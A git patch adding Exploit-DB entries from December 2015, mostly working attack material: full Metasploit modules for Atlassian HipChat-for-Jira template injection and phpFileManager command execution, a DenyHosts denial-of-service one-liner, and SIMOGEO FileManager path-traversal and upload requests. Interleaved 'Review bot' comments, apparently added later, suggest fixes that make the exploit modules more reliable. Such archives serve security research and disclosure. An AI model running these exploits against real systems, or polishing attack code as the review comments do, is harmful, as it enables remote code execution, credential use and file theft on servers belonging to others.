From fa0d0d29073ffeec961c635a29b806449d4b050c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 Dec 2015 05:02:11 +0000 Subject: [PATCH] DB: 2015-12-09 17 new exploits --- files.csv | 17 + platforms/linux/dos/38909.txt | 7 + platforms/multiple/remote/38905.rb | 643 +++++++++++++++++++++++++++++ platforms/php/remote/38900.rb | 115 ++++++ platforms/php/webapps/38895.txt | 124 ++++++ platforms/php/webapps/38901.txt | 28 ++ platforms/php/webapps/38902.txt | 29 ++ platforms/php/webapps/38906.txt | 120 ++++++ platforms/php/webapps/38907.txt | 111 +++++ platforms/php/webapps/38908.txt | 7 + platforms/windows/dos/38878.txt | 36 ++ platforms/windows/local/38903.txt | 92 +++++ platforms/windows/local/38904.txt | 106 +++++ platforms/windows/remote/38910.txt | 11 + platforms/xml/webapps/38896.py | 288 +++++++++++++ platforms/xml/webapps/38897.txt | 78 ++++ platforms/xml/webapps/38898.txt | 121 ++++++ platforms/xml/webapps/38899.txt | 45 ++ 18 files changed, 1978 insertions(+) create mode 100755 platforms/linux/dos/38909.txt create mode 100755 platforms/multiple/remote/38905.rb create mode 100755 platforms/php/remote/38900.rb create mode 100755 platforms/php/webapps/38895.txt create mode 100755 platforms/php/webapps/38901.txt create mode 100755 platforms/php/webapps/38902.txt create mode 100755 platforms/php/webapps/38906.txt create mode 100755 platforms/php/webapps/38907.txt create mode 100755 platforms/php/webapps/38908.txt create mode 100755 platforms/windows/dos/38878.txt create mode 100755 platforms/windows/local/38903.txt create mode 100755 platforms/windows/local/38904.txt create mode 100755 platforms/windows/remote/38910.txt create mode 100755 platforms/xml/webapps/38896.py create mode 100755 platforms/xml/webapps/38897.txt create mode 100755 platforms/xml/webapps/38898.txt create mode 100755 platforms/xml/webapps/38899.txt diff --git a/files.csv b/files.csv index a10d6b3e2..6257ba24d 100755 --- a/files.csv +++ b/files.csv 
@@ -35143,6 +35143,7 @@ id,file,description,date,author,platform,type,port
 38875,platforms/php/webapps/38875.php,"osCMax Arbitrary File Upload and Full Path Information Disclosure Vulnerabilities",2013-12-09,KedAns-Dz,php,webapps,0
 38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0
 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0
+38878,platforms/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash PoC",2015-12-06,Un_N0n,windows,dos,0
 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection Vulnerabilities",2013-12-14,R3d-D3V!L,asp,webapps,0
 38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
@@ -35157,3 +35158,19 @@ id,file,description,date,author,platform,type,port
 38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80
+38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0
+38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection Vulnerability",2015-12-08,LiquidWorm,xml,webapps,0
+38898,platforms/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps,0
+38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure Vulnerability",2015-12-08,LiquidWorm,xml,webapps,0
+38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 Remote Code Execution",2015-12-08,metasploit,php,remote,80
+38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80
+38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection Vulnerability",2015-12-08,WICS,php,webapps,80
+38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0
+38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0
+38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,metasploit,multiple,remote,8080
+38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80
+38907,platforms/php/webapps/38907.txt,"Osclass Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0
+38908,platforms/php/webapps/38908.txt,"Leed 'id' Parameter SQL Injection Vulnerability",2013-12-18,"Alexandre Herzog",php,webapps,0
+38909,platforms/linux/dos/38909.txt,"DenyHosts 'regex.py' Remote Denial of Service Vulnerability",2013-12-19,"Helmut Grohne",linux,dos,0
+38910,platforms/windows/remote/38910.txt,"Hancom Office '.hml' File Processing Heap Buffer Overflow Vulnerability",2013-12-19,diroverflow,windows,remote,0
diff --git a/platforms/linux/dos/38909.txt b/platforms/linux/dos/38909.txt
new file mode 100755
index 000000000..25ab4756a
--- /dev/null
+++ b/platforms/linux/dos/38909.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64478/info
+
+DenyHosts is prone to a remote denial-of-service vulnerability.
+
+Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users.
+
+ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21
\ No newline at end of file
diff --git a/platforms/multiple/remote/38905.rb b/platforms/multiple/remote/38905.rb
new file mode 100755
index 000000000..2358d2ae1
--- /dev/null
+++ b/platforms/multiple/remote/38905.rb
@@ -0,0 +1,643 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'json' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection", + 'Description' => %q{ + Atlassian Hipchat is a web service for internal instant messaging. A plugin is available + for Jira that allows team collibration at real time. A message can be used to inject Java + code into a Velocity template, and gain code exeuction as Jira. Authentication is required + to exploit this vulnerability, and you must make sure the account you're using isn't + protected by captcha. By default, Java payload will be used because it is cross-platform, + but you can also specify which native payload you want (Linux or Windows). + + HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions + between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with + a vulnerable copy of HipChat. + + When using the check command, if you supply a valid username and password, the module + will be able to trigger the bug and check more accurately. If not, it falls back to + passive, which can only tell if the target is running on a Jira version that is bundled + with a vulnerable copy of Hipchat by default, which is less reliable. + + This vulnerability was originally discovered internally by Atlassian. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chris Wood', # PoC + 'sinn3r' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2015-5603' ], + [ 'EDB', '38551' ], + [ 'BID', '76698' ], + [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ] + ], + 'Targets' => + [ + [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], + [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], + [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] + ], + 'DefaultOptions' => + { + 'RPORT' => 8080 + }, + 'Privileged' => false, + 'DisclosureDate' => 'Oct 28 2015', + 'DefaultTarget' => 0 + )) + + register_options( + [ + # Auth is required, but when we use the check command we allow them to be optional. + OptString.new('JIRAUSER', [false, 'Jira Username', '']), + OptString.new('JIRAPASS', [false, 'Jira Password', '']), + OptString.new('TARGETURI', [true, 'The base to Jira', '/']) + ], self.class) + end + + + # Returns a cookie in a hash, so you can ask for a specific parameter. + # + # @return [Hash] + def get_cookie_as_hash(cookie) + Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten] + end + + + # Checks the target by actually triggering the bug. + # + # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered. + # Exploit::CheckCode::Unknown if something failed. + # Exploit::CheckCode::Safe for the rest. + def do_explicit_check + begin + cookie = do_login + # I don't really care which command to execute, as long as it's a valid one for both platforms. + # If the command is valid, it should return {"message"=>"0"}. + # If the command is not valid, it should return an empty hash. 
+ c = get_exec_code('whoami') + res = inject_template(c, cookie) + json = res.get_json_document + if json['message'] && json['message'] == '0' + return Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Safe + end + + + # Returns the Jira version + # + # @return [String] Found Jira version + # @return [NilClass] No Jira version found. + def get_jira_version + version = nil + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') + }) + + unless res + vprint_error('Connection timed out while retrieving the Jira version.') + return version + end + + metas = res.get_html_meta_elements + + version_element = metas.select { |m| + m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number' + }.first + + unless version_element + vprint_error('Unable to find the Jira version.') + return version + end + + version_element.attributes['content'] ? version_element.attributes['content'].value : nil + end + + + # Checks the target by looking at things like the Jira version, or whether the Jira web app + # exists or not. + # + # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns + # Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return + # Exploit::CheckCode::Detected, because it's possible to have Jira not bundled + # with HipChat by default, but installed separately. For other scenarios, we + # return Safe. + def do_passive_check + jira_version = get_jira_version + vprint_status("Found Jira version: #{jira_version}") + if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11' + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + + # Checks the vulnerability. Username and password are required to be able to accurately verify + # the vuln. 
If supplied, we will try the explicit check (which will trigger the bug, so should + # be more reliable). If not, we will try the passive one (less accurately, but better than + # nothing). + # + # @see #do_explicit_check + # @see #do_passive_check + # + # @return [Array] Check code + def check + checkcode = Exploit::CheckCode::Safe + + if jira_cred_empty? + vprint_status("No username and password supplied, so we can only do a passive check.") + checkcode = do_passive_check + else + checkcode = do_explicit_check + end + + checkcode + end + + + # Returns the Jira username set by the user + def jira_username + datastore['JIRAUSER'] + end + + + # Returns the Jira password set by the user + def jira_password + datastore['JIRAPASS'] + end + + + # Reports username and password to the database. + # + # @param opts [Hash] + # @option opts [String] :user + # @option opts [String] :password + # + # @return [void] + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + + # Returns a valid login cookie. 
+ # + # @return [String] + def do_login + cookie = '' + + prerequisites = get_login_prerequisites + xsrf = prerequisites['atlassian.xsrf.token'] + sid = prerequisites['JSESSIONID'] + uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, + 'cookie' => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}", + 'vars_post' => { + 'os_username' => jira_username, + 'os_password' => jira_password, + 'os_captcha' => '' # Not beatable yet + } + }) + + unless res + fail_with(Failure::Unknown, 'Connection timed out while trying to login') + end + + json = res.get_json_document + + if json.empty? + fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.') + end + + if json['loginSucceeded'] + cookie = res.get_cookies + elsif !json['loginSucceeded'] && json['captchaFailure'] + fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.") + elsif !json['loginSucceeded'] + fail_with(Failure::NoAccess, 'Incorrect username or password') + end + + report_cred( + user: jira_username, + password: jira_password + ) + + cookie + end + + + # Returns login prerequisites + # + # @return [Hash] + def get_login_prerequisites + uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') + res = send_request_cgi({ 'uri' => uri }) + + unless res + fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites') + end + + get_cookie_as_hash(res.get_cookies) + end + + + # Returns the target platform. + # + # @param cookie [String] Jira cookie + # @return [String] + def get_target_platform(cookie) + c = get_os_detection_code + res = inject_template(c, cookie) + json = res.get_json_document + json['message'] || '' + end + + + # Returns Java code that can be used to inject to the template in order to write a file. 
+ # + # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code, + # and then execute the new file instead. + # + # @param fname [String] File to write to. + # @param p [String] Payload + # @return [String] + def get_write_file_code(fname, p) + b64 = Rex::Text.encode_base64(p) + %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) | + end + + + # Returns the Java code that gives us the remote Java home path. + # + # @return [String] + def get_java_path_code + get_java_property_code('java.home') + end + + + # Returns the OS/platform information. + # + # @return [String] + def get_os_detection_code + get_java_property_code('os.name') + end + + + # Returns the temp path for Java. + # + # @return [String] + def get_temp_path_code + get_java_property_code('java.io.tmpdir') + end + + + # Returns a system property for Java. + # + # @param prop [String] Name of the property to retrieve. + # @return [String] + def get_java_property_code(prop) + %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() | + end + + + # Returns the Java code to execute a jar file. + # + # @param java_path [String] Java home path + # @param war_path [String] The jar file to execute + # @return [String] + def get_jar_exec_code(java_path, war_path) + # A quick way to check platform instead of actually grabbing os.name in Java system properties. 
+ if /^\/[[:print:]]+/ === war_path + normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java') + cmd_str = %Q|#{normalized_java_path} -jar #{war_path}| + else + normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe') + war_path.gsub!(/Program Files/, 'PROGRA~1') + cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"| + end + + %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() | + end + + + # Returns Java code that can be used to inject to the template in order to execute a file. + # + # @param cmd [String] command to execute + # @return [String] + def get_exec_code(cmd) + %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() | + end + + + # Returns Java code that can be used to inject to the template in order to chmod a file. + # + # @param fname [String] File to chmod + # @return [String] + def get_chmod_code(fname) + get_exec_code("chmod 777 #{fname}") + end + + + # Returns Java code that can be used to inject to the template in order to copy a file. + # + # @note The purpose of this method is to have a file that is not busy, so we can execute it. + # It is meant to be used with #get_write_file_code. + # + # @param fname [String] The file to copy + # @param new_fname [String] The new file + # @return [String] + def get_dup_file_code(fname, new_fname) + if fname =~ /^\/[[:print:]]+/ + cp_cmd = "cp #{fname} #{new_fname}" + else + cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}" + end + + get_exec_code(cp_cmd) + end + + + # Returns a boolean indicating whether the module has a username and password. + # + # @return [TrueClass] There is an empty cred. + # @return [FalseClass] No empty cred. + def jira_cred_empty? + jira_username.blank? || jira_password.blank? + end + + + # Injects Java code to the template. 
+ # + # @param p [String] Code that is being injected. + # @param cookie [String] A cookie that contains a valid JSESSIONID + # @return [void] + def inject_template(p, cookie) + login_sid = get_cookie_as_hash(cookie)['JSESSIONID'] + + uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render') + uri << '/' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'cookie' => "JSESSIONID=#{login_sid}", + 'ctype' => 'application/json', + 'data' => { 'message' => p }.to_json + }) + + if !res + # This seems to trigger every time even though we're getting a shell. So let's downplay + # this a little bit. At least it's logged to allow the user to debug. + elog('Connection timed out in #inject_template') + elsif res && /Error report/ === res.body + print_error('Failed to inject and execute code:') + vprint_line(res.body) + elsif res + vprint_status("Server response:") + vprint_line res.body + end + + res + end + + + # Checks if the target os/platform is compatible with the module target or not. + # + # @return [TrueClass] Compatible + # @return [FalseClass] Not compatible + def target_platform_compat?(target_platform) + target.platform.names.each do |n| + if /^java$/i === n || /#{n}/i === target_platform + return true + end + end + + false + end + + + # Returns the normalized file path for payload. + # + # @return [String] + def normalize_payload_fname(tmp_path, fname) + # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. + if /^\/[[:print:]]+/ === tmp_path + Rex::FileUtils.normalize_unix_path(tmp_path, fname) + else + Rex::FileUtils.normalize_win_path(tmp_path, fname) + end + end + + + # Returns a temp path from the remote target. 
+ # + # @param cookie [String] Jira cookie + # @return [String] + def get_tmp_path(cookie) + c = get_temp_path_code + res = inject_template(c, cookie) + json = res.get_json_document + json['message'] || '' + end + + + # Returns the Java home path used by Jira. + # + # @param cookie [String] Jira cookie. + # @return [String] + def get_java_home_path(cookie) + c = get_java_path_code + res = inject_template(c, cookie) + json = res.get_json_document + json['message'] || '' + end + + + # Exploits the target in Java platform. + # + # @return [void] + def exploit_as_java(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") + jar = payload.encoded_jar + java_home = get_java_home_path(cookie) + register_files_for_cleanup(jar_fname) + + if java_home.blank? + fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') + else + print_status("Found Java home path: #{java_home}") + end + + print_status("Attempting to write #{jar_fname}") + c = get_write_file_code(jar_fname, jar) + inject_template(c, cookie) + + print_status("Executing #{jar_fname}") + c = get_jar_exec_code(java_home, jar_fname) + inject_template(c, cookie) + end + + + # Exploits the target in Windows platform. + # + # @return [void] + def exploit_as_windows(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? 
+ fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) + exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + exe_fname.gsub!(/Program Files/, 'PROGRA~1') + exe_new_fname.gsub!(/Program Files/, 'PROGRA~1') + register_files_for_cleanup(exe_fname, exe_new_fname) + + print_status("Attempting to write #{exe_fname}") + c = get_write_file_code(exe_fname, exe) + inject_template(c, cookie) + + print_status("New file will be #{exe_new_fname}") + c = get_dup_file_code(exe_fname, exe_new_fname) + inject_template(c, cookie) + + print_status("Executing #{exe_new_fname}") + c = get_exec_code(exe_new_fname) + inject_template(c, cookie) + end + + + # Exploits the target in Linux platform. + # + # @return [void] + def exploit_as_linux(cookie) + tmp_path = get_tmp_path(cookie) + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) + new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) + register_files_for_cleanup(fname, new_fname) + + print_status("Attempting to write #{fname}") + p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) + c = get_write_file_code(fname, p) + inject_template(c, cookie) + + print_status("chmod +x #{fname}") + c = get_exec_code("chmod 777 #{fname}") + inject_template(c, cookie) + + print_status("New file will be #{new_fname}") + c = get_dup_file_code(fname, new_fname) + inject_template(c, cookie) + + print_status("Executing #{new_fname}") + c = get_exec_code(new_fname) + inject_template(c, cookie) + end + + + def exploit + if jira_cred_empty? 
+ fail_with(Failure::BadConfig, 'Jira username and password are required.') + end + + print_status("Attempting to login as #{jira_username}:#{jira_password}") + cookie = do_login + print_good("Successfully logged in as #{jira_username}") + + target_platform = get_target_platform(cookie) + print_status("Target being detected as: #{target_platform}") + + unless target_platform_compat?(target_platform) + fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') + end + + case target.name + when /java$/i + exploit_as_java(cookie) + when /windows$/i + exploit_as_windows(cookie) + when /linux$/i + exploit_as_linux(cookie) + end + + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + +end \ No newline at end of file diff --git a/platforms/php/remote/38900.rb b/platforms/php/remote/38900.rb new file mode 100755 index 000000000..04757343c --- /dev/null +++ b/platforms/php/remote/38900.rb 
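Review bot: `exploit` writes the Jira password to the console in `print_status("Attempting to login as #{jira_username}:#{jira_password}")`, so the credential lands in console output and any session log even though `report_cred` already records it in the database; the line should be `print_status("Attempting to login as #{jira_username}")`. In `do_passive_check`, `jira_version >= '6.3.5' && jira_version < '6.4.11'` compares version strings lexicographically (a "6.3.10" sorts below "6.3.5"), the `else` branch returns `Detected` even when `get_jira_version` returned nil, and the trailing `Exploit::CheckCode::Safe` the comment promises is unreachable; guard nil with a `Safe` return and compare with `Gem::Version.new(jira_version).between?(Gem::Version.new('6.3.5'), Gem::Version.new('6.4.10'))`. `inject_template` returns nil on a timeout, but `do_explicit_check` then calls `res.get_json_document` unguarded and rescues only `Msf::Exploit::Failed`, so a timeout during `check` surfaces as a NoMethodError instead of `CheckCode::Unknown`; an `unless res` returning `Unknown` before the JSON parse fixes that.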
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'phpFileManager 0.9.8 Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a remote code execution vulnerability in phpFileManager
+ 0.9.8 which is a filesystem management tool on a single file.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hyp3rlinx', # initial discovery
+ 'Jay Turla' # msf
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '37709' ],
+ [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ }
+ },
+ 'Platform' => %w{ unix win },
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
+ ['phpFileManager / Windows', { 'Platform' => 'win' } ]
+ ],
+ 'DisclosureDate' => 'Aug 28 2015',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
+ ],self.class)
+ end
+
+ def check
+ txt = Rex::Text.rand_text_alpha(8)
+ res = http_send_command("echo #{txt}")
+
+ if res && res.body =~ /#{txt}/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def push
+ uri = normalize_uri(target_uri.path)
+
+ # To push the Enter button
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => {
+ 'frame' => '3',
+ 'pass' => '' # yep this should be empty
+ }
+ })
+
+ if res.nil?
+ vprint_error("#{peer} - Connection timed out")
+ fail_with(Failure::Unknown, "Failed to trigger the Enter button")
+ end
+
+ if res && res.headers && res.code == 302
+ print_good("#{peer} - Logged in to the file manager")
+ cookie = res.get_cookies
+ cookie
+ else
+ fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
+ end
+ end
+
+ def http_send_command(cmd)
+ cookie = push
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path),
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'action' => '6',
+ 'cmd' => cmd
+ }
+ })
+ unless res && res.code == 200
+ fail_with(Failure::Unknown, "Failed to execute the command.")
+ end
+ res
+ end
+
+ def exploit
+ http_send_command(payload.encoded)
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/38895.txt b/platforms/php/webapps/38895.txt
new file mode 100755
index 000000000..be9273382
--- /dev/null
+++ b/platforms/php/webapps/38895.txt
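Review bot: `check` calls `http_send_command`, and both it and `push` call `fail_with` on a timeout or an unexpected status, so running `check` against an unreachable or patched host raises `Msf::Exploit::Failed` instead of returning `Exploit::CheckCode::Unknown`; wrap the call in `begin … rescue Msf::Exploit::Failed => e` with `vprint_error(e.message); return Exploit::CheckCode::Unknown`. In `push`, the `if res && res.headers && res.code == 302` test is only reached after the `res.nil?` branch has already failed, so `res &&` and the `res.headers` test are dead and `if res.code == 302` says the same thing. The `fail_with` messages are inconsistent: two carry a `#{peer} - ` prefix and two do not — pick one form.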
@@ -0,0 +1,124 @@
+# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability
+# Date: 2015-12-09
+# Exploit Author: HaHwul
+# Exploit Author Blog: http://www.codeblack.net
+# Vendor Homepage: https://github.com/simogeo/Filemanager
+# Software Link: git clone http://github.com/simogeo/Filemanager.git
+# Version: 2.3.0
+# Tested on: Debian [Wheezy]
+# CVE : none
+
+Path Traversal Code
+http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd
+
+Filtering Rules: "../" -> blank
+Bypass Filtering : ....// -> deleted "../" -> ../
+
+Attack Request
+GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1
+Host: 192.168.0.15
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+
+Response
+HTTP/1.1 200 OK
+Date: Tue, 08 Dec 2015 17:18:52 GMT
+Server: Apache/2.2.16 (Debian)
+X-Powered-By: PHP/5.3.3-7+squeeze19
+Content-Transfer-Encoding: Binary
+Content-Length: 1383
+Content-Disposition: inline; filename="passwd"
+Keep-Alive: timeout=15, max=100
+Connection: Keep-Alive
+Content-Type: image/
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+..snip..
+
+
+###################################################
+
+
+# Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability
+# Date: 2015-12-09
+# Exploit Author: HaHwul
+# Exploit Author Blog: http://www.codeblack.net
+# Vendor Homepage: https://github.com/simogeo/Filemanager
+# Software Link: git clone http://github.com/simogeo/Filemanager.git
+# Version: 2.3.0
+# Tested on: Debian [Wheezy]
+# CVE : none
+
+1. Upload File
+
+POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1
+Host: 192.168.0.15
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
+Accept: application/json
+Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cache-Control: no-cache
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.0.15/vul_test/target/Filemanager/
+Content-Length: 520
+Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737
+Connection: keep-alive
+Pragma: no-cache
+
+-----------------------------1675330531498115896355630737
+Content-Disposition: form-data; name="mode"
+
+add
+-----------------------------1675330531498115896355630737
+Content-Disposition: form-data; name="currentpath"
+
+/vul_test/target/Filemanager/userfiles/
+-----------------------------1675330531498115896355630737
+Content-Disposition: form-data; name="newfile"; filename="shell.txt"
+Content-Type: text/plain
+
+echo "Write PHP WebShell Code";
+
+
+-----------------------------1675330531498115896355630737--
+
+
